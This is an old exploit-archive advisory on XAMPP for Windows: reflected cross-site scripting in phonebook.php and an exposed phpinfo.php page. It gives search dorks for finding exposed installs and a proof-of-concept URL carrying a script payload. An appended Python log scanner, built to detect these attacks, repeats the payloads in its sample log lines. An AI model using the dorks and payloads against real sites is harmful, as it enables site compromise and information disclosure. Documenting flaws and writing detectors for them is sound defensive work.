XAMPP for Windows suffers from phpinfo and cross-site scripting vulnerabilities. Versions 1.4.9, 1.5.0, 1.5.1, and 1.6.4 are affected.
60935ec6be7f5fb4deb26711efb9b60a04780eda94243ede59b9d4971ca716ab
# XAMPP for Windows (XSS/PHPinfo) Multiple Vulnerabilities
# AUTHOR : Cru3l.b0y
# DATE : 05 APR 2009
# SITE : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y@deltahacking.net
#####################################################
# APPLICATION : XAMPP for Windows
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLOAD : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR : http://www.apachefriends.org/
#####################################################
[+] XSS:
Dork : inurl:"/xampp/phonebook.php"
Exploit :
The vulnerability is in the phonebook page. First go to site.com/xampp/phonebook.php,
then enter a script in the First name or Phone number box and press ADD. The script will run successfully.
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>
[+] PHPinfo:
Dork : inurl:"/xampp/phpinfo.php"
Exploit : http://127.0.0.1/xampp/phpinfo.php
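
Added example (not part of the original advisory): a log check an administrator can run over an Apache access log to spot markup submitted to the phonebook fields and phpinfo.php being served to non-local clients. The log format (Apache common/combined), the sample lines and the function names are assumptions made for this example.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Assumed format: Apache common/combined access log.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')
# Markup that has no place in a phonebook name or number field.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:', re.I)
PHONEBOOK_FIELDS = ("firstname", "lastname", "phone")

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [05/Apr/2009:10:00:00 +0000] "GET /xampp/phonebook.php?lastname=t'
    '&firstname=%3Cscript%3Ealert(123)%3C/script%3E&phone=%3Cscript%3Ealert(123)%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.9 - - [05/Apr/2009:10:01:00 +0000] "GET /xampp/phpinfo.php HTTP/1.1" 200 40960',
    '127.0.0.1 - - [05/Apr/2009:10:02:00 +0000] "GET /xampp/phpinfo.php HTTP/1.1" 200 40960',
    '203.0.113.8 - - [05/Apr/2009:10:03:00 +0000] "GET /xampp/phonebook.php?firstname=Ann&phone=555-0100 HTTP/1.1" 200 512',
]

def classify(line):
    """Return the findings for one access-log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    findings = []
    if path == "/xampp/phonebook.php":
        # Only query-string values are visible here; POST bodies are not logged.
        params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        for field in PHONEBOOK_FIELDS:
            if any(MARKUP_RE.search(v) for v in params.get(field, [])):
                findings.append(f"markup in phonebook field '{field}' from {client}")
    if path == "/xampp/phpinfo.php" and status == "200":
        try:
            local = ip_address(client).is_loopback
        except ValueError:  # client logged as a hostname: treat as non-local
            local = False
        if not local:
            findings.append(f"phpinfo.php served to non-local client {client}")
    return findings

def scan(lines):
    """Map each line number (1-based) with findings to its list of findings."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}
```
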
##############################################################################################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #
##############################################################################################